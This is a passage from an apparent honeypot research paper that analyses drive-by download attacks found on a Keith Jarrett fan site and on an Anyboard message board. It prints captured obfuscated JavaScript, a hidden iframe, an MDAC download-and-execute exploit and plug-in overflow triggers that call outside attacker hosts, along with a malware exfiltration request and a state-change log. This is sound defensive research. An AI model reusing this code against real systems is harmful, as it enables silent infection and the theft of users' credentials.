IN-DEPTH ANALYSIS

During our study, we encountered many malicious URLs. We have analyzed a few representatives to provide insight on how these servers operate and what sort of harm they can pose to the victim. Please refer to the shaded boxes or feel free to skip ahead to summary and recommendations.

figure8

Figure 8 - The Keith Jarrett fan site

The Italian fan site of the jazz pianist and composer Keith Jarrett (http://www.keithjarrett.it) is a malicious site. We found this site by submitting the keyword “Keith Jarrett” from our music category to the Yahoo! search engine, which resulted in the return of this URL in the 15th place on the results list. The site itself is quite simple and is shown in Figure 8. It contains text, images, and links, but no rich media content. We chose this site for an in-depth analysis as it includes some typical aspects of a malicious server, such as obfuscation, exploit location on a central exploit provider server, and a typical example of the spyware that is being deployed upon successful exploitation. Besides these elements, it also contains some more advanced techniques that are targeted at a) hiding the attack and b) increasing the likelihood of attack success. Due to space limitations, we only show portions of data from this site, but do make the complete set available from our website at: http://newzealand.honeynet.org/kye/mws/keith_jarrett.zip.

The exploit that triggers upon visitation of the Keith Jarrett site is not directly contained on the page. We do, however, find a snippet of JavaScript code that “imports” the exploit from a different server onto the page. The snippet of code is shown in Figure 9 and initially doesn’t give much away since it is obfuscated.

<script language=JavaScript>
function dc(x)= st2 ns = "isiresearchsoft-com/cwyw" />
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,17,21,4,60,32,52,45,13,28,0,0,0,0,0,0,5,
42,57,37,41,48,62,59,56,24,46,31,38,12,3,27,19,1,39,36,6,26,44,20,9,33,34,0,0,0,0,43,0,15,
53,40,8,2,54,16,7,0,14,23,18,11,22,58,35,51,50,29,25,47,10,30,55,49,61);for(j=Math.ceil(l/b);j>0;j--)
{r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s)
{r+=String.fromCharCode(250^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}
dc('TaXRdJBCKAsZdLBysmDpjAdE2ksLdFdCKodbIjX52kBpjl7ZlAIxUxHSwocShxzrs_7SKjtR
loHysu9xURcpNUBRhx8pPLHSIjDCPoH5i_7SPoDRKltEsPVy2aXRdJBCKlM')\
</script>

Figure 9 - Obfuscated JavaScript

Because the JavaScript code needs to be converted to clear text in order “import” the exploit, the decryption routine is included within the JavaScript code. This makes it easy to extract the clear text, which is shown in Figure 10. It is a simple hidden iframe that includes the page out.php from the server crunet.biz. From there, we observed several redirects and more obfuscation until we were able to view the actual exploit code.

<iframe src='http://crunet.biz/out.php' width='1' height='1' style='visibility:
hidden;'></iframe>

Figure 10 - Clear value of obfuscated JavaScript

The obfuscation of the iframe code is one step we encountered frequently, targeted to hide the attack from static analysis tools, such as network based intrusion detection systems. On the Keith Jarrett site, we encountered an additional mechanism that was probably designed to evade detection. Our client honeypot was attacked by www.keithjarrett.it during the initial crawl. However, upon subsequent visits to the same URL, the exploit only triggered on occasion. We suspect that this is a measure to evade client honeypots like ours.

The exploit code itself (portions are shown in Figure 11 and Figure 12) contains some interesting aspects we would like to highlight. The attack code is a multi-step attack that first obtains the payload via the XMLHTTP object, writes it to disk via the ADODB (BID: 10514) object and then executes it with the WScript.Shell or Shell.Application object (BID: 10652). This attack path was disabled by Microsoft in 2004 and is not going to be successful unless an unpatched version of Internet Explorer 6 SP2 is used. The attack follows these three stages with each stage using error handling to increase the chances of the attack succeeding (for example, the usage of the Shell.Application object in case the WScript.Shell object fails).

function MDAC() {
       var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
       var v = new Array(null, null, null);
       var i = 0;
       var n = 0;
       var ret = 0;
       var urlRealExe = 'http://crunet.biz/pack/file.php';
       while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
              var a = null;
              try {
                     a = document.createElement("object");
                     a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
              } catch(e) { a = null; }
              if (a) {
                     if (! v[0]) {
                           v[0] = CreateObject(a, "msxml2.XMLHTTP");
                           if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
                           if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
                     }
                     if (! v[1]) {
                           v[1] = CreateObject(a, "ADODB.Stream");
                     }
                     if (! v[2]) {
                           v[2] = CreateObject(a, "WScript.Shell");
                           if (! v[2]) {
                                  v[2] = CreateObject(a, "Shell.Application");
                                  if (v[2]) n= 1;
                           }
                     }
              }
              i++;
       }
       if (v[0] && v[1] && v[2]) {
              var data = XMLHttpDownload(v[0], urlRealExe);
              if (data != 0) {
                     var name = "c:\\sys"+GetRandString(4)+".exe";
                     if (ADOBDStreamSave(v[1], name, data) == 1) {
                           if (ShellExecute(v[2], name, n) == 1) {
                                  ret=1;
                           }
                     }
              }
       }
       return ret;
}

Figure 11 - Exploit code - portion 1

The exploit code doesn’t stop there. As previously mentioned, the attack code in Figure 11 will fail on a fully patched version of Internet Explorer. If it does fail, the code in Figure 12 is executed. This code attempts to exploit a vulnerability in Apple’s QuickTime (BID: 21829), Winzip (http://www.securityfocus.com/archive/1/455612), and last finally in Microsoft’s web view (BID: 19030). The first two target much more recent vulnerabilities and non-browser applications, so even a fully patched Internet Explorer would allow for such an attack to be successful if the proper applications are installed. As browsers are becoming more secure, we expect attackers to concentrate on plug-ins and other client applications such as these.

function startOverflow(num)
{
       if (num == 0) {
              try {
                     var qt = new ActiveXObject('QuickTime.QuickTime');            
                     if (qt) {
                           var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
                               width="1" height="1" style="border:0px">'+
                           '<param name="src" value="qt.php">'+
                           '<param name="autoplay" value="true">'+
                           '<param name="loop" value="false">'+
                           '<param name="controller" value="true">'+
                           '</object>';
                            if (! mem_flag) makeSlide();
                           document.getElementById('mydiv').innerHTML = qthtml;
                           num = 255;
                     }
              } catch(e) { }
              if (num = 255) setTimeout("startOverflow(1)", 2000);
              else startOverflow(1);
       } else if (num == 1) {
              try {
                     var winzip = document.createElement("object");
                     winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");
                     var ret=winzip.CreateNewFolderFromName(unescape("%00"));
                     if (ret == false) {
                           if (! mem_flag) makeSlide();
                           startWinZip(winzip);
                           num = 255;
                     }
              } catch(e) { }
              if (num = 255) setTimeout("startOverflow(2)", 2000);
              else startOverflow(2);
       } else if (num == 2) {
              try {
                     var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
                     if (tar) {
                           if (! mem_flag) makeSlide();
                           startWVF();
                     }
              } catch(e) { }
       }
}

Figure 12 - Exploit code - portion 2

<table border="1" cellspacing="0" cellpadding="0" align="left">
      <tr>

        <td width="56" valign="bottom" bordercolor="#000000"><p><strong>Monitor&nbsp;</strong><strong> </strong></p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p><strong>Action&nbsp;</strong><strong> </strong></p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p><strong>Actor&nbsp;</strong><strong> </strong></p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p><strong>Action parameter&nbsp;</strong><strong> </strong></p></td>
      </tr>

      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>file&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Write&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\Program    Files\Internet Explorer\IEXPLORE.EXE&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\syswcon.exe&nbsp; </p></td>

      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>process&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Created&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\Program    Files\Internet Explorer\IEXPLORE.EXE&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\syswcon.exe&nbsp; </p></td>

      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>file&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Write&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\syswcon.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\uzcx.exe&nbsp; </p></td>

      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>process&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Created&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\syswcon.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\uzcx.exe&nbsp; </p></td>

      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>process&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Terminated&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\Program    Files\Internet Explorer\IEXPLORE.EXE&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\syswcon.exe&nbsp; </p></td>

      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>registry&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>SetValueKey&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\    uzcx.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>HKCU\Software\ewrew\uzcx\main\cid&nbsp; </p></td>

      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>file&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Write&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\    uzcx.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\Documents    and Settings\cseifert\&nbsp; <br />

          Local    Settings\Temporary Internet&nbsp; <br />
          Files\Content.IE5\OPUJWX63\&nbsp; <br />
          benupd32[1].exe&nbsp; </p></td>
      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>file&nbsp; </p></td>

        <td width="75" valign="bottom" bordercolor="#000000"><p>Write&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\    uzcx.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\benupd32.exe&nbsp; </p></td>
      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>process&nbsp; </p></td>

        <td width="75" valign="bottom" bordercolor="#000000"><p>Created&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\    uzcx.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\benupd32.exe&nbsp; </p></td>
      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>registry&nbsp; </p></td>

        <td width="75" valign="bottom" bordercolor="#000000"><p>SetValueKey&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\drivers\    uzcx.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>HKCU\Software\ewrew\uzcx\main\term&nbsp; </p></td>
      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>process&nbsp; </p></td>

        <td width="75" valign="bottom" bordercolor="#000000"><p>Created&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\benupd32.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\benupd32.exe&nbsp; </p></td>
      </tr>
      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>file&nbsp; </p></td>

        <td width="75" valign="bottom" bordercolor="#000000"><p>Write&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>&nbsp;</p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\Documents    and Settings\cseifert\&nbsp; <br />
          Local    Settings\Temp\clean_33d87.dll&nbsp; </p></td>
      </tr>
      <tr>

        <td width="56" valign="bottom" bordercolor="#000000"><p>process&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>Created&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\benupd32.exe&quot;&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\system32\regsvr32.exe&nbsp; </p></td>
      </tr>

      <tr>
        <td width="56" valign="bottom" bordercolor="#000000"><p>registry&nbsp; </p></td>
        <td width="75" valign="bottom" bordercolor="#000000"><p>SetValueKey&nbsp; </p></td>
        <td width="247" valign="bottom" bordercolor="#000000"><p>C:\WINDOWS\explorer.exe&nbsp; </p></td>
        <td width="246" valign="bottom" bordercolor="#000000"><p>HKLM\SYSTEM\ControlSet001\Services\&nbsp; <br />

          ldrsvc\Parameters\ServiceDll&nbsp; </p></td>
      </tr>
    </table>

Table 3 - Keith Jarrett attack – observed state changes

Once the exploit was successful, malware was downloaded and executed on the client machine. All of this, of course, happens in the background and is not noticeable by the user. Table 3 shows some of the actions taken by the exploit and malware; the malware is downloaded and then executes. Multiple executables and dll files are subsequently written and executed. Benupd32.exe writes the clean_33d87.dll file to disk and proceeds to register and install it as a service, so it will be started automatically upon a reboot of the client machine. These log files were generated with the help of the client honeypot Capture-HPC.

What does the malware do once it takes control of your system? Sniffing the network stream reveals that during web browsing, in particular form submissions, the malware forwards the content of the form to a malicious data collection server named lddpaym.net. An example of these requests is shown in Figure 13. While we were not able to convert the binary data into clear text, we did discover some clear text data collection files on the web that match the format shown of the requests that we captured. These files contained a comprehensive list of URLs and the corresponding form data, mostly account names and passwords. The data was neatly separated per client machine, so it grouped the different account information per user. One stolen username and password is already quite dangerous. If the attacker has a collection of various credentials from the same user, for example e-mail and bank account information, it provides the attacker with a much more powerful set of information that will greatly increase the likelihood of a successful scam. For example, the attacker could first disable e-mail notifications from the user’s bank before proceeding to raid their bank account.

/ewDf/dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF
/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVk
WjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache
--swefasvqdvwxff
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream
Q+XBMVFhG5Q00cU14KO1zhSPDm7HDrF1gGfSICO7kQJkszUFdVQ/RJWldRC1RgUPJD7Nfodu0l
UgswJhs04Gc1VCtxV1FZhhYHAEYQQzkap1vm5/tH6CZdBXIsQT7yeitmJ1ZeKkzjDA80cTZuIWzPbK
Pw/n2qLFMMeCs4NuV3N0E3QEFXXNoMDF1cE1x/TKZN+u/qfOtjHlo6IQA3+nwrYDhGTUJF7EoB
Bk0RV3dK60md7ON86AR2IURuXX32cCBdPExwSEbtBQUbETt/WSOpGr3m4HftK1s3eCENNfV8Y
Vk9R1pBROEEAhNJd0ZsfeZDubqqduAnXQt7EAg2+nIiXHFPRUdM6AlnEUwTQGBS41Hm4PFjrnoaB
nAgDTv8QChRPUVCTAfrCwcGXhxXZlLpJ+D85GmHIFINMDcbM+52O1I7AFlGXOIMRw1WE1JxV
udN+u7hd/0gS057Jwp28GUsVzoGSk1P6gwGEEIcUHwMqRDj9/Br7kMeWjA8ETfsQChRPUVCTAf8F
gcKQQFWYlmGQern+nbhIEULdyROar1xIFA9S0twT+EKBRVbWlx6R/BG/+/rcM4ZMQFtIBo29nc1XD
dDDh0N4QcHGlsbZ39G6kX166F3/SBOa3cmFTbwZjFQKEpCRAm9TQYXVx1bfHfvRvrl4nuqLF0HZy
UOWud7JlE3UkxHQ65aTRZXEFp7TNdP9uridexmVBx3Jx5X4GskTlRQXkoL8QcNGlxcUHFS5kDH9up
662k7TnsnCnbwZSxXOgRTU1yrSVMHRwxZHnSzEqzX3VzaKlACeCUECMkcdgVqBRcVHaxVUk0RT
QIjA9pjk4GFZc0VLhMXQ
--swefasvqdvwxff—

Figure 13 - Data sent by malware

The server involved in collecting the data was different than the server hosting the actual exploit code. The data collection server was located in the Republic of Moldavia, but registered to a person from Ukraine. The server hosting the exploit code was located in Russia and registered to a person from Germany and the site we initially accessed (www.keithjarrett.it) was located in Italy. We were unsuccessful when we ask the administrative contacts for the web server initially accessed to remove the malicious code. It is not at all clear if the original site itself as well as the servers hosting the exploit code were either servers controlled by people intending on distributing malware or had been compromised by attackers and modified to distribute it. However, this example illustrates the diverse nature of the components which are, willingly or unwillingly, involved in the scam to obtain (and eventually (ab)use) account data from users. Given such a distributed network of parties and systems, it would be difficult to identify and prosecute the criminals involved.

http://www.anyboard.net/suggest/posts/7933.html

Another malicious page we identified was located on a server that ran the message board Anyboard. We chose to include an in-depth analysis of this site, because it contains interesting aspects around the attack and the malware deployed. This site allows us to illustrate user submitted exploits, additional measures taken to avoid detection, and social engineering aspects that are involved in the scam.

The attack from anyboard.net demonstrates that the operator of the web site might not always be involved in the attack. The attack is possible because the deployed web application on the server follows bad practices enabling the server to be abused by its users. In this particular instance, the web application allows users to post messages to a threaded message board, but doesn’t seem to perform any input validation on the message posts. As a result, malicious users can post harmful JavaScript code. On post 7933, this seems to have happened where a user posted a script to include an exploit as shown in the HTML code snippet shown in Figure 14.


<div class="MessageBody"><font size=-1 face="Verdana"><script src="http://www.impliedscripting.com/js/?cl=90716&q=interracial+cuckold"></script>
<br ab><center><h1>Free

Figure 14 - User supplied exploit

The exploit itself follows the same pattern as the one found on the Keith Jarrett site. JavaScript is obfuscated, causes several redirects and then actually triggers the real exploit. The import method, however, is different than the one on the Keith Jarrett site though. Instead of using an iframe that imports the exploit, JavaScript code redirects the user to the page that contains the exploit via a client-side redirect as shown in Figure 15. If this code is combined with obfuscation, as this was the case here, it is difficult to follow the code in an automated fashion. Crawlers or low-interaction client honeypots need to be JavaScript-aware to do so. This technique illustrates the attempts to avoid detection and identification of the attack.

<script language='javascript' STYLE="behavior:url(#default#clientCaps)" ID="oCli entCaps">
var ref = document.referrer;
var url = document.URL;
if (ref.indexOf('cache:') <= 0 && url.indexOf('cache:') <= 0) {
        window.location.href='http://www.impliedscripting.com/spawn/?r=' +  escape(ref) + '&u=' + escape(url) + '&c=' + escape(oClientCaps.connectionType) + '&cl=' + escape('90716') + '&q=' + escape('interracial cuckold');
}
</script>

Figure 15 - Client-side redirect

figure16

Figure 16 - Malware notification

Once the exploit triggers and gains control of the client machine, we usually observed a quiet installation of malware that subsequently performs its evil deeds. The exploit encountered on anyboard.net is quite different. It applies social engineering strategy by disguising itself as anti-malware software, informing the user that malware exists on the machine, and then proceeds to entice the user to purchase a license of this “anti-malware software”. Figure 16 shows the initial notification about malware existing on the user’s machine. Note how the messaging mechanism resembles the messages of the Microsoft Security Center. Shortly after, the software proceeds to scan the machine and provide specific information about the malware that “exists” on the user’s machine as shown in Figure 17. Conveniently, a pop-up window suggests to purchase a license of this “anti-malware software” online. Major credit cards are accepted.

figure17

Figure 17 - PestTrap